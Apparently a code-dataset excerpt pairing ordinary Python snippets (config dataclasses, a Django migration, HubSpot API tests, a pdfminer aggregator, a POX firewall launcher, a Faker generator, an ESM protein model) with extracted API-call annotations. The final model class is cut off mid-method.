code | apis | extract_api
---|---|---
from dataclasses import dataclass, field
from typing import Optional, Iterable, Union
@dataclass
class MetabaseConfig:
    # Metabase Client
    database: str
    host: str
    user: str
    password: str
    # Metabase additional connection opts
    use_http: bool = False
    verify: Union[str, bool] = True
    # Metabase Sync
    sync_skip: bool = False
    sync_timeout: Optional[int] = None


@dataclass
class DbtConfig:
    # dbt Reader
    database: str
    manifest_path: Optional[str] = None
    path: Optional[str] = None
    # dbt Target Models
    schema: Optional[str] = None
    schema_excludes: Iterable = field(default_factory=list)
    includes: Iterable = field(default_factory=list)
    excludes: Iterable = field(default_factory=list)
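A minimal usage sketch of the two config dataclasses above; every connection value below is a placeholder, not a real default:

metabase_cfg = MetabaseConfig(
    database="analytics",            # placeholder database name
    host="metabase.example.com",     # placeholder host
    user="service-account",
    password="secret",
    sync_timeout=60,
)
dbt_cfg = DbtConfig(
    database="analytics",
    manifest_path="target/manifest.json",   # placeholder dbt manifest location
    schema="public",
    includes=["orders", "customers"],
)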
| [
"dataclasses.field"
] | [((624, 651), 'dataclasses.field', 'field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (629, 651), False, 'from dataclasses import dataclass, field\n'), ((677, 704), 'dataclasses.field', 'field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (682, 704), False, 'from dataclasses import dataclass, field\n'), ((730, 757), 'dataclasses.field', 'field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (735, 757), False, 'from dataclasses import dataclass, field\n')] |
from dotenv import load_dotenv
load_dotenv()
import sys
import os
import re
import json
import psycopg2
from meme_classifier.images import process_image
# Path to a chat-export directory containing result.json and the referenced photo files.
path = sys.argv[1]
with open(os.path.join(path, 'result.json'), 'r') as f:
    data = json.load(f)
chat_id = data['id']
conn = psycopg2.connect(os.getenv('POSTGRES_CREDENTIALS'))
for m in data['messages']:
    if 'photo' in m:
        # Classify the meme template and extract its text from the photo.
        with open(os.path.join(path, m['photo']), 'rb') as photo:
            template, text = process_image(photo)
        message_id = m['id']
        print(f'processing message {message_id}')
        cur = conn.cursor()
        cur.execute(
            "INSERT INTO meme (template, text, chat_id, message_id) VALUES (%s, %s, %s, %s)",
            (template, text, chat_id, message_id),
        )
        conn.commit()
        cur.close()
conn.close()
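For reference, a hypothetical minimal shape of the result.json the loop above expects; the field names ('id', 'messages', 'photo') come straight from the code, the rest is illustrative:

example_export = {
    "id": 123456789,  # becomes chat_id
    "messages": [
        {"id": 1, "photo": "photos/photo_1.jpg"},  # has a photo -> classified and inserted
        {"id": 2, "text": "just text"},             # no photo -> skipped
    ],
}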
| [
"os.path.join",
"os.getenv",
"dotenv.load_dotenv"
] | [((31, 44), 'dotenv.load_dotenv', 'load_dotenv', ([], {}), '()\n', (42, 44), False, 'from dotenv import load_dotenv\n'), ((284, 317), 'os.getenv', 'os.getenv', (['"""POSTGRES_CREDENTIALS"""'], {}), "('POSTGRES_CREDENTIALS')\n", (293, 317), False, 'import os\n'), ((198, 231), 'os.path.join', 'os.path.join', (['path', '"""result.json"""'], {}), "(path, 'result.json')\n", (210, 231), False, 'import os\n'), ((412, 442), 'os.path.join', 'os.path.join', (['path', "m['photo']"], {}), "(path, m['photo'])\n", (424, 442), False, 'import os\n')] |
# Generated by Django 2.0.3 on 2018-03-15 01:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('nps', '0012_auto_20180314_1600'),
]
operations = [
migrations.CreateModel(
name='ClientAggregations',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('client', models.CharField(max_length=30)),
('survey', models.CharField(max_length=30)),
('user_type', models.CharField(blank=True, default=None, max_length=30, null=True)),
('nps_score', models.FloatField()),
('total_responses', models.IntegerField()),
('promoters', models.IntegerField()),
('detractors', models.IntegerField()),
('neutral', models.IntegerField()),
('percent_detractors', models.FloatField(blank=True, default=None, null=True)),
('percent_promoters', models.FloatField(blank=True, default=None, null=True)),
('percent_neutral', models.FloatField(blank=True, default=None, null=True)),
('statistically_significant', models.BooleanField(default=False)),
],
),
migrations.DeleteModel(
name='AggregatedResults',
),
migrations.DeleteModel(
name='ProductUsers',
),
migrations.RenameField(
model_name='productaggregations',
old_name='total_detractors',
new_name='detractors',
),
migrations.RenameField(
model_name='productaggregations',
old_name='total_neutral',
new_name='neutral',
),
migrations.RenameField(
model_name='productaggregations',
old_name='number_clients_negative',
new_name='num_clients_negative',
),
migrations.RenameField(
model_name='productaggregations',
old_name='number_clients_positive',
new_name='num_clients_positive',
),
migrations.RenameField(
model_name='productaggregations',
old_name='total_promoters',
new_name='promoters',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='total_detractors',
new_name='detractors',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='total_neutral',
new_name='neutral',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='number_clients_negative',
new_name='num_clients_negative',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='number_clients_positive',
new_name='num_clients_positive',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='total_promoters',
new_name='promoters',
),
migrations.RemoveField(
model_name='productaggregations',
name='number_clients_neutral',
),
migrations.RemoveField(
model_name='productaggregations',
name='percent_clients_neutral',
),
migrations.RemoveField(
model_name='surveyaggregations',
name='number_clients_neutral',
),
migrations.RemoveField(
model_name='surveyaggregations',
name='percent_clients_neutral',
),
migrations.AddField(
model_name='productaggregations',
name='user_type',
field=models.CharField(blank=True, default=None, max_length=30, null=True),
),
migrations.AddField(
model_name='surveyaggregations',
name='user_type',
field=models.CharField(blank=True, default=None, max_length=30, null=True),
),
migrations.AlterUniqueTogether(
name='clientaggregations',
unique_together={('client', 'survey', 'user_type')},
),
]
| [
"django.db.migrations.AlterUniqueTogether",
"django.db.migrations.DeleteModel",
"django.db.models.FloatField",
"django.db.models.IntegerField",
"django.db.models.BooleanField",
"django.db.models.AutoField",
"django.db.migrations.RemoveField",
"django.db.migrations.RenameField",
"django.db.models.CharField"
] | [((1327, 1375), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', ([], {'name': '"""AggregatedResults"""'}), "(name='AggregatedResults')\n", (1349, 1375), False, 'from django.db import migrations, models\n'), ((1408, 1451), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', ([], {'name': '"""ProductUsers"""'}), "(name='ProductUsers')\n", (1430, 1451), False, 'from django.db import migrations, models\n'), ((1484, 1597), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""productaggregations"""', 'old_name': '"""total_detractors"""', 'new_name': '"""detractors"""'}), "(model_name='productaggregations', old_name=\n 'total_detractors', new_name='detractors')\n", (1506, 1597), False, 'from django.db import migrations, models\n'), ((1649, 1756), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""productaggregations"""', 'old_name': '"""total_neutral"""', 'new_name': '"""neutral"""'}), "(model_name='productaggregations', old_name=\n 'total_neutral', new_name='neutral')\n", (1671, 1756), False, 'from django.db import migrations, models\n'), ((1808, 1938), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""productaggregations"""', 'old_name': '"""number_clients_negative"""', 'new_name': '"""num_clients_negative"""'}), "(model_name='productaggregations', old_name=\n 'number_clients_negative', new_name='num_clients_negative')\n", (1830, 1938), False, 'from django.db import migrations, models\n'), ((1990, 2120), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""productaggregations"""', 'old_name': '"""number_clients_positive"""', 'new_name': '"""num_clients_positive"""'}), "(model_name='productaggregations', old_name=\n 'number_clients_positive', new_name='num_clients_positive')\n", (2012, 2120), False, 'from django.db import migrations, models\n'), ((2172, 2283), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""productaggregations"""', 'old_name': '"""total_promoters"""', 'new_name': '"""promoters"""'}), "(model_name='productaggregations', old_name=\n 'total_promoters', new_name='promoters')\n", (2194, 2283), False, 'from django.db import migrations, models\n'), ((2335, 2447), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""surveyaggregations"""', 'old_name': '"""total_detractors"""', 'new_name': '"""detractors"""'}), "(model_name='surveyaggregations', old_name=\n 'total_detractors', new_name='detractors')\n", (2357, 2447), False, 'from django.db import migrations, models\n'), ((2499, 2605), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""surveyaggregations"""', 'old_name': '"""total_neutral"""', 'new_name': '"""neutral"""'}), "(model_name='surveyaggregations', old_name=\n 'total_neutral', new_name='neutral')\n", (2521, 2605), False, 'from django.db import migrations, models\n'), ((2657, 2786), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""surveyaggregations"""', 'old_name': '"""number_clients_negative"""', 'new_name': '"""num_clients_negative"""'}), "(model_name='surveyaggregations', old_name=\n 'number_clients_negative', new_name='num_clients_negative')\n", (2679, 2786), False, 'from django.db import migrations, models\n'), ((2838, 2967), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""surveyaggregations"""', 'old_name': 
'"""number_clients_positive"""', 'new_name': '"""num_clients_positive"""'}), "(model_name='surveyaggregations', old_name=\n 'number_clients_positive', new_name='num_clients_positive')\n", (2860, 2967), False, 'from django.db import migrations, models\n'), ((3019, 3129), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""surveyaggregations"""', 'old_name': '"""total_promoters"""', 'new_name': '"""promoters"""'}), "(model_name='surveyaggregations', old_name=\n 'total_promoters', new_name='promoters')\n", (3041, 3129), False, 'from django.db import migrations, models\n'), ((3181, 3273), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""productaggregations"""', 'name': '"""number_clients_neutral"""'}), "(model_name='productaggregations', name=\n 'number_clients_neutral')\n", (3203, 3273), False, 'from django.db import migrations, models\n'), ((3313, 3406), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""productaggregations"""', 'name': '"""percent_clients_neutral"""'}), "(model_name='productaggregations', name=\n 'percent_clients_neutral')\n", (3335, 3406), False, 'from django.db import migrations, models\n'), ((3446, 3537), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""surveyaggregations"""', 'name': '"""number_clients_neutral"""'}), "(model_name='surveyaggregations', name=\n 'number_clients_neutral')\n", (3468, 3537), False, 'from django.db import migrations, models\n'), ((3577, 3669), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""surveyaggregations"""', 'name': '"""percent_clients_neutral"""'}), "(model_name='surveyaggregations', name=\n 'percent_clients_neutral')\n", (3599, 3669), False, 'from django.db import migrations, models\n'), ((4116, 4231), 'django.db.migrations.AlterUniqueTogether', 'migrations.AlterUniqueTogether', ([], {'name': '"""clientaggregations"""', 'unique_together': "{('client', 'survey', 'user_type')}"}), "(name='clientaggregations', unique_together={\n ('client', 'survey', 'user_type')})\n", (4146, 4231), False, 'from django.db import migrations, models\n'), ((3824, 3892), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': 'None', 'max_length': '(30)', 'null': '(True)'}), '(blank=True, default=None, max_length=30, null=True)\n', (3840, 3892), False, 'from django.db import migrations, models\n'), ((4027, 4095), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': 'None', 'max_length': '(30)', 'null': '(True)'}), '(blank=True, default=None, max_length=30, null=True)\n', (4043, 4095), False, 'from django.db import migrations, models\n'), ((338, 431), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (354, 431), False, 'from django.db import migrations, models\n'), ((457, 488), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (473, 488), False, 'from django.db import migrations, models\n'), ((518, 549), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (534, 549), False, 'from django.db import migrations, models\n'), ((582, 650), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': 'None', 
'max_length': '(30)', 'null': '(True)'}), '(blank=True, default=None, max_length=30, null=True)\n', (598, 650), False, 'from django.db import migrations, models\n'), ((683, 702), 'django.db.models.FloatField', 'models.FloatField', ([], {}), '()\n', (700, 702), False, 'from django.db import migrations, models\n'), ((741, 762), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (760, 762), False, 'from django.db import migrations, models\n'), ((795, 816), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (814, 816), False, 'from django.db import migrations, models\n'), ((850, 871), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (869, 871), False, 'from django.db import migrations, models\n'), ((902, 923), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (921, 923), False, 'from django.db import migrations, models\n'), ((965, 1019), 'django.db.models.FloatField', 'models.FloatField', ([], {'blank': '(True)', 'default': 'None', 'null': '(True)'}), '(blank=True, default=None, null=True)\n', (982, 1019), False, 'from django.db import migrations, models\n'), ((1060, 1114), 'django.db.models.FloatField', 'models.FloatField', ([], {'blank': '(True)', 'default': 'None', 'null': '(True)'}), '(blank=True, default=None, null=True)\n', (1077, 1114), False, 'from django.db import migrations, models\n'), ((1153, 1207), 'django.db.models.FloatField', 'models.FloatField', ([], {'blank': '(True)', 'default': 'None', 'null': '(True)'}), '(blank=True, default=None, null=True)\n', (1170, 1207), False, 'from django.db import migrations, models\n'), ((1256, 1290), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (1275, 1290), False, 'from django.db import migrations, models\n')] |
import time
import unittest
from nose.plugins.attrib import attr
from hubspot3.test import helper
from hubspot3.broadcast import Broadcast, BroadcastClient
class BroadcastClientTest(unittest.TestCase):
""" Unit tests for the HubSpot Broadcast API Python client.
This file contains some unittest tests for the Broadcast API.
Questions, comments: http://docs.hubapi.com/wiki/Discussion_Group
"""
def setUp(self):
self.client = BroadcastClient(**helper.get_options())
self.broadcast_guids = None
def tearDown(self):
# Cancel any broadcasts created as part of the tests
if self.broadcast_guids:
list(map(self.client.cancel_broadcast, self.broadcast_guids))
@attr("api")
def test_get_broadcasts(self):
# Should fetch at least 1 broadcast on the test portal 62515
broadcasts = self.client.get_broadcasts(limit=1)
self.assertTrue(len(broadcasts) > 0)
broadcast = broadcasts[0].to_dict()
self.assertIsNotNone(broadcast["channelGuid"])
print("\n\nFetched some broadcasts")
broadcast_guid = broadcast["broadcastGuid"]
# Re-fetch the broadcast using different call
bcast = self.client.get_broadcast(broadcast_guid)
# Should have expected fields
self.assertIsNotNone(bcast.broadcast_guid)
self.assertIsNotNone(bcast.channel_guid)
self.assertIsNotNone(bcast.status)
@attr("api")
def test_get_channels(self):
# Fetch older channels ensured to exist
channels = self.client.get_channels(current=True)
self.assertTrue(len(channels) > 0)
@attr("api")
def test_create_broadcast(self):
content = dict(body="Test hubspot3 unit tests http://www.hubspot.com")
channels = self.client.get_channels(current=True, publish_only=True)
if len(channels) == 0:
self.fail("Failed to find a publishable channel")
channel = channels[0]
# Get a trigger in the future
trigger_at = int(time.time() + 6000) * 1000
bcast = Broadcast(
{
"content": content,
"triggerAt": trigger_at,
"channelGuid": channel.channel_guid,
}
)
try:
resp = self.client.create_broadcast(bcast)
broadcast = Broadcast(resp)
self.assertIsNotNone(broadcast.broadcast_guid)
self.assertEqual(channel.channel_guid, broadcast.channel_guid)
# Ensure it is canceled
self.broadcast_guids = []
self.broadcast_guids.append(broadcast.broadcast_guid)
except Exception as e:
self.fail("Should not have raised exception: {}".format(e))
if __name__ == "__main__":
unittest.main()
| [
"nose.plugins.attrib.attr",
"hubspot3.test.helper.get_options",
"unittest.main",
"time.time",
"hubspot3.broadcast.Broadcast"
] | [((733, 744), 'nose.plugins.attrib.attr', 'attr', (['"""api"""'], {}), "('api')\n", (737, 744), False, 'from nose.plugins.attrib import attr\n'), ((1448, 1459), 'nose.plugins.attrib.attr', 'attr', (['"""api"""'], {}), "('api')\n", (1452, 1459), False, 'from nose.plugins.attrib import attr\n'), ((1648, 1659), 'nose.plugins.attrib.attr', 'attr', (['"""api"""'], {}), "('api')\n", (1652, 1659), False, 'from nose.plugins.attrib import attr\n'), ((2782, 2797), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2795, 2797), False, 'import unittest\n'), ((2084, 2181), 'hubspot3.broadcast.Broadcast', 'Broadcast', (["{'content': content, 'triggerAt': trigger_at, 'channelGuid': channel.\n channel_guid}"], {}), "({'content': content, 'triggerAt': trigger_at, 'channelGuid':\n channel.channel_guid})\n", (2093, 2181), False, 'from hubspot3.broadcast import Broadcast, BroadcastClient\n'), ((2356, 2371), 'hubspot3.broadcast.Broadcast', 'Broadcast', (['resp'], {}), '(resp)\n', (2365, 2371), False, 'from hubspot3.broadcast import Broadcast, BroadcastClient\n'), ((476, 496), 'hubspot3.test.helper.get_options', 'helper.get_options', ([], {}), '()\n', (494, 496), False, 'from hubspot3.test import helper\n'), ((2041, 2052), 'time.time', 'time.time', ([], {}), '()\n', (2050, 2052), False, 'import time\n')] |
#!/usr/bin/env python3
import math
import sys


def prerr(*args, **kwargs):
    # Minimal stderr print helper used for the install hint below.
    print(*args, file=sys.stderr, **kwargs)


try:
    # from PDFPageDetailedAggregator:
    from pdfminer.pdfdocument import PDFDocument, PDFNoOutlines
    from pdfminer.pdfparser import PDFParser
    from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
    from pdfminer.converter import PDFPageAggregator
    from pdfminer.layout import LTPage, LTChar, LTAnno, LAParams, LTTextBox, LTTextLine
except ModuleNotFoundError:
    prerr("To use the aggregator (required for generating chunks.json)"
          " you must first install the following module for Python:")
    prerr("    pdfminer")
    sys.exit(1)
try:
input = raw_input
except NameError:
# Python 3
pass
# TODO:
from srd import (
objDict,
BBox,
DocChunk,
clean_frag_text,
clean_frag,
same_style,
frag_dict,
)
def ltannoDict(ltanno):
return objDict(ltanno)
'''
class DocFragment:
def __init__(self, text, fontname, size):
self.text = text
self.fontname = fontname
self.size = size
def sameStyle(self, fragment):
"""
Is same fontname and size.
"""
ffn = fragment.fontname
ffs = fragment.size
return (ffs == self.size) and (ffn == self.fontname)
def clean(self):
self.text = clean_frag_text(self.text)
'''
class PDFPageDetailedAggregator(PDFPageAggregator):
"""
This class is based on PDFPageDetailedAggregator from
lindblandro's Oct 4 '13 at 10:33 answer
edited by slushy Feb 4 '14 at 23:41
at <https://stackoverflow.com/a/19179114>
on <https://stackoverflow.com/questions/15737806/extract-text-using-
pdfminer-and-pypdf2-merges-columns>.
"""
def __init__(self, rsrcmgr, pageno=1, laparams=None,
colStarts=None):
PDFPageAggregator.__init__(self, rsrcmgr, pageno=pageno, laparams=laparams)
self.chunks = []
self.colStarts = colStarts
if self.colStarts is not None:
print("columns: {}".format(len(self.colStarts)))
self.page_number = 0
def receive_layout(self, ltpage):
def render(item, page_number):
if isinstance(item, LTPage) or isinstance(item, LTTextBox):
for child in item:
render(child, page_number)
elif isinstance(item, LTTextLine):
child_str = ''
fontSize = None
fontName = None
fontSizes = []
fontNames = []
warnings = []
parts = []
fragments = []
annotations = []
for child in item:
strp = None
if isinstance(child, LTChar):
child_str += child.get_text()
strp = child.get_text().strip()
# and (len(strp) > 0)
if fontName is not None:
if fontName != child.fontname:
warnings.append("mixed fontName")
if fontSize is not None:
if fontSize != child.size:
warnings.append("mixed fontSize")
fontName = child.fontname
fontSize = child.size
frag = frag_dict(
child.get_text(),
child.fontname,
child.size,
)
fragments.append(frag)
# fontNames.append(fontName)
# fontSizes.append(fontSize)
parts.append(strp)
elif isinstance(child, LTAnno):
child_str += child.get_text()
strp = child.get_text().strip()
annotations.append(ltannoDict(child))
child_str = ' '.join(child_str.split()).strip()
if child_str:
if len(warnings) > 0:
"""
print("Warnings in \"{}\":"
" {}: fonts {} sizes {} parts {}"
"".format(child_str, warnings, fontNames,
fontSizes, parts))
input("Press enter to continue...")
"""
fontSize = None
fontName = None
col = None
cols = 0
if self.colStarts is not None:
cols = len(self.colStarts)
                    if (self.colStarts is None) or (cols == 1):  # colStarts=None behaves like a single column
col = 0
elif (cols == 2):
col = 0
col2Min = math.floor(self.colStarts[1])
if item.bbox[0] >= col2Min:
col = 1 # Index [1] is column 2.
else:
raise ValueError("Only a list of length 1 (same as None) or 2"
" is implemented for \"colStarts\".")
# if isinstance(child, LTChar):
'''
try:
fontName = child.fontname
fontSize = child.size
# Avoid "AttributeError:
# 'LTAnno' object has no attribute 'fontname'"
except AttributeError as ex:
print("dir(LTTextLine): {}".format(dir(LTTextLine)))
print("dir(child): {}".format(dir(child)))
raise ex
'''
chunk = DocChunk(
page_number,
col,
item.bbox,
child_str,
fontName=fontName,
fontSize=fontSize,
fragments=fragments,
annotations=annotations,
)
chunk.groupFragments()
self.chunks.append(chunk)
for child in item:
render(child, page_number)
return
render(ltpage, self.page_number)
self.page_number += 1
self.chunks = sorted(self.chunks, key = lambda f: (f.pageid, f.column, -f.bbox.y1))
self.result = ltpage
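The class above only defines the aggregation device; a typical pdfminer.six driver loop, sketched from the imports at the top of this file (the aggregate_chunks name and the fp file handle are illustrative, not part of the original module):

def aggregate_chunks(fp, colStarts=None):
    # Standard pdfminer plumbing: parser -> document -> resource manager -> device -> interpreter.
    from pdfminer.pdfpage import PDFPage  # page iteration helper, not imported above
    parser = PDFParser(fp)
    document = PDFDocument(parser)
    rsrcmgr = PDFResourceManager()
    device = PDFPageDetailedAggregator(rsrcmgr, laparams=LAParams(), colStarts=colStarts)
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    for page in PDFPage.create_pages(document):
        interpreter.process_page(page)  # triggers receive_layout(), which collects DocChunk objects
    return device.chunks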
| [
"srd.DocChunk",
"pdfminer.converter.PDFPageAggregator.__init__",
"srd.objDict",
"math.floor"
] | [((851, 866), 'srd.objDict', 'objDict', (['ltanno'], {}), '(ltanno)\n', (858, 866), False, 'from srd import objDict, BBox, DocChunk, clean_frag_text, clean_frag, same_style, frag_dict\n'), ((1782, 1857), 'pdfminer.converter.PDFPageAggregator.__init__', 'PDFPageAggregator.__init__', (['self', 'rsrcmgr'], {'pageno': 'pageno', 'laparams': 'laparams'}), '(self, rsrcmgr, pageno=pageno, laparams=laparams)\n', (1808, 1857), False, 'from pdfminer.converter import PDFPageAggregator\n'), ((5800, 5936), 'srd.DocChunk', 'DocChunk', (['page_number', 'col', 'item.bbox', 'child_str'], {'fontName': 'fontName', 'fontSize': 'fontSize', 'fragments': 'fragments', 'annotations': 'annotations'}), '(page_number, col, item.bbox, child_str, fontName=fontName,\n fontSize=fontSize, fragments=fragments, annotations=annotations)\n', (5808, 5936), False, 'from srd import objDict, BBox, DocChunk, clean_frag_text, clean_frag, same_style, frag_dict\n'), ((4868, 4897), 'math.floor', 'math.floor', (['self.colStarts[1]'], {}), '(self.colStarts[1])\n', (4878, 4897), False, 'import math\n')] |
from pox.core import core
import pox.openflow.libopenflow_01 as of
from forwarding.l2_learning import *
from tkinter import *
from project.firewall import TestFW
from project.ui import UI
def setup():
top = Toplevel()
# quit POX when window is killed
top.protocol("WM_DELETE_WINDOW", core.quit)
top.title("firewall thing")
    frame = Frame(top, padx=3, pady=3)  # tkinter.Frame has no "padding" option (that is ttk-only)
    frame.grid()
    # Keep a reference to the Label itself; .grid() returns None.
    disp = Label(frame, text="hmm")
    disp.grid(column=0, row=0)
    def reload():
        conn = core.openflow.getConnection(1)
        disp.configure(text=str(dir(conn)))
b_reload = Button(frame, text="reload", command=reload).grid(column=0, row=1)
b_quit = Button(frame, text="quit", command=top.destroy).grid(column=0, row=2)
def launch():
fw_list_dpid = [51, 52]
srv_list = {"web" : ['10.0.0.100']}
# register firewall
core.registerNew(TestFW, fw_list_dpid[0], srv_list)
# just use L2 learning switch for others
core.registerNew(l2_learning, False)
#core.registerNew(UI)
def start_ui():
core.tk.do(setup)
core.call_when_ready(start_ui, ['openflow', 'tk'])
| [
"pox.core.core.tk.do",
"pox.core.core.call_when_ready",
"pox.core.core.registerNew",
"pox.core.core.openflow.getConnection"
] | [((851, 902), 'pox.core.core.registerNew', 'core.registerNew', (['TestFW', 'fw_list_dpid[0]', 'srv_list'], {}), '(TestFW, fw_list_dpid[0], srv_list)\n', (867, 902), False, 'from pox.core import core\n'), ((954, 990), 'pox.core.core.registerNew', 'core.registerNew', (['l2_learning', '(False)'], {}), '(l2_learning, False)\n', (970, 990), False, 'from pox.core import core\n'), ((1080, 1130), 'pox.core.core.call_when_ready', 'core.call_when_ready', (['start_ui', "['openflow', 'tk']"], {}), "(start_ui, ['openflow', 'tk'])\n", (1100, 1130), False, 'from pox.core import core\n'), ((500, 530), 'pox.core.core.openflow.getConnection', 'core.openflow.getConnection', (['(1)'], {}), '(1)\n', (527, 530), False, 'from pox.core import core\n'), ((1049, 1066), 'pox.core.core.tk.do', 'core.tk.do', (['setup'], {}), '(setup)\n', (1059, 1066), False, 'from pox.core import core\n')] |
# Example: fetch course-change / rescheduling notices
from zfnew import GetInfo, Login
base_url = 'homepage URL of the school educational-administration system'
lgn = Login(base_url=base_url)
lgn.login('account', 'password')
cookies = lgn.cookies  # how to obtain the cookies
person = GetInfo(base_url=base_url, cookies=cookies)
message = person.get_message()
print(message)
| [
"zfnew.GetInfo",
"zfnew.Login"
] | [((82, 106), 'zfnew.Login', 'Login', ([], {'base_url': 'base_url'}), '(base_url=base_url)\n', (87, 106), False, 'from zfnew import GetInfo, Login\n'), ((175, 218), 'zfnew.GetInfo', 'GetInfo', ([], {'base_url': 'base_url', 'cookies': 'cookies'}), '(base_url=base_url, cookies=cookies)\n', (182, 218), False, 'from zfnew import GetInfo, Login\n')] |
import sys
import random
from faker import Faker
def gera(nLinhas=100, nCampos=None):
with open(f"{path}/file{nLinhas}-{nCampos}_python.txt", "w+", encoding="utf8") as file:
if not nCampos:
nCampos = random.randint(2, 10)
camposFuncs = [
fake.name,
fake.date,
fake.ssn,
fake.ascii_email,
fake.job,
fake.phone_number,
fake.coordinate,
fake.license_plate,
fake.credit_card_expire,
][:nCampos]
for _ in range(nLinhas):
file.write(f"{random.randint(0, 999999)},")
for funcao in camposFuncs[:-1]:
file.write(f"{funcao()},")
file.write(camposFuncs[-1]())
file.write("\n")
if __name__ == "__main__":
fake = Faker("pt_BR")
path = "python/"
    # Fall back to defaults when the CLI arguments are missing or not integers.
    try:
        nLinhas = int(sys.argv[1])
        nCampos = int(sys.argv[2])
    except (IndexError, ValueError):
        nLinhas = 1000
        nCampos = 10
gera(nLinhas, nCampos)
| [
"faker.Faker",
"random.randint"
] | [((830, 844), 'faker.Faker', 'Faker', (['"""pt_BR"""'], {}), "('pt_BR')\n", (835, 844), False, 'from faker import Faker\n'), ((226, 247), 'random.randint', 'random.randint', (['(2)', '(10)'], {}), '(2, 10)\n', (240, 247), False, 'import random\n'), ((602, 627), 'random.randint', 'random.randint', (['(0)', '(999999)'], {}), '(0, 999999)\n', (616, 627), False, 'import random\n')] |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from .modules import (
TransformerLayer,
LearnedPositionalEmbedding,
SinusoidalPositionalEmbedding,
RobertaLMHead,
ESM1bLayerNorm,
ContactPredictionHead,
)
class ProteinBertModel(nn.Module):
@classmethod
def add_args(cls, parser):
parser.add_argument(
"--num_layers", default=36, type=int, metavar="N", help="number of layers"
)
parser.add_argument(
"--embed_dim", default=1280, type=int, metavar="N", help="embedding dimension"
)
parser.add_argument(
"--logit_bias", action="store_true", help="whether to apply bias to logits"
)
parser.add_argument(
"--ffn_embed_dim",
default=5120,
type=int,
metavar="N",
help="embedding dimension for FFN",
)
parser.add_argument(
"--attention_heads",
default=20,
type=int,
metavar="N",
help="number of attention heads",
)
def __init__(self, args, alphabet):
super().__init__()
self.args = args
self.alphabet_size = len(alphabet)
self.padding_idx = alphabet.padding_idx
self.mask_idx = alphabet.mask_idx
self.cls_idx = alphabet.cls_idx
self.eos_idx = alphabet.eos_idx
if self.args.arch == 'roberta_large':
self.model_version = 'ESM-1b'
self._init_submodules_esm1b()
else:
self.model_version = 'ESM-1'
self._init_submodules_esm1()
def _init_submodules_common(self):
self.embed_tokens = nn.Embedding(
self.alphabet_size, self.args.embed_dim, padding_idx=self.padding_idx
)
self.layers = nn.ModuleList(
[
TransformerLayer(
self.args.embed_dim, self.args.ffn_embed_dim, self.args.attention_heads,
add_bias_kv=(self.model_version != 'ESM-1b'),
use_esm1b_layer_norm=(self.model_version == 'ESM-1b'),
)
for _ in range(self.args.layers)
]
)
self.contact_head = ContactPredictionHead(self.args.layers * self.args.attention_heads)
def _init_submodules_esm1b(self):
self._init_submodules_common()
self.embed_scale = 1
self.embed_positions = LearnedPositionalEmbedding(self.args.max_positions, self.args.embed_dim, self.padding_idx)
self.emb_layer_norm_before = ESM1bLayerNorm(self.args.embed_dim)
self.emb_layer_norm_after = ESM1bLayerNorm(self.args.embed_dim)
self.lm_head = RobertaLMHead(
embed_dim=self.args.embed_dim,
output_dim=self.alphabet_size,
weight=self.embed_tokens.weight
)
def _init_submodules_esm1(self):
self._init_submodules_common()
self.embed_scale = math.sqrt(self.args.embed_dim)
self.embed_positions = SinusoidalPositionalEmbedding(self.args.embed_dim, self.padding_idx)
self.embed_out = nn.Parameter(
torch.zeros((self.alphabet_size, self.args.embed_dim))
)
self.embed_out_bias = None
if self.args.final_bias:
self.embed_out_bias = nn.Parameter(torch.zeros(self.alphabet_size))
def forward(self, tokens, repr_layers=[], need_head_weights=False, return_contacts=False):
if return_contacts:
need_head_weights = True
assert tokens.ndim == 2
